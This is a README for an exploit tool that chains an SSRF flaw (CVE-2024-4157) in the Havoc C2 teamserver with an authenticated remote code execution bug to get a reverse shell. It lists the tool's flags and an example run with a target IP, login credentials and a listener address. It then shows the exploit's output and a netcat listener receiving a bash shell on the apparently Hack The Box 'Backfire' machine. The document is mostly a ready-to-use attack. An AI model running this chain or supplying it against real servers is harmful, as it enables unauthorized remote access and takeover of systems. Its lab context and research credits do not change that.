# CVE-2024-4157: Getting Reverse Shell on Havoc C2  - Chaining SSRF with RCE
Get reverse-shell with local IP and Port, chaining [CVE-2024-4157 POC](https://github.com/chebuya/Havoc-C2-SSRF-poc) with [havoc_auth_rce](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce)

## Usage
- Basic info
```bash
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port 
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
```
- Example
```bash
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
```
- Reverse shell on our `nc` listener
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 
```

## Credit

- Credit to [@chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc) with the SSRF, [detailed blog on the vulnerability](https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/)
- Credit to [@Laurence Tennant](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce) with the RCE, [detailed info on blog](https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/)
- Credit to [0xdf](https://0xdf.gitlab.io/2025/06/07/htb-backfire.html) with the amazing writeup on [HTB Backfire](https://app.hackthebox.com/machines/Backfire)

## Disclaimer
- This tool is for educational and research purposes only
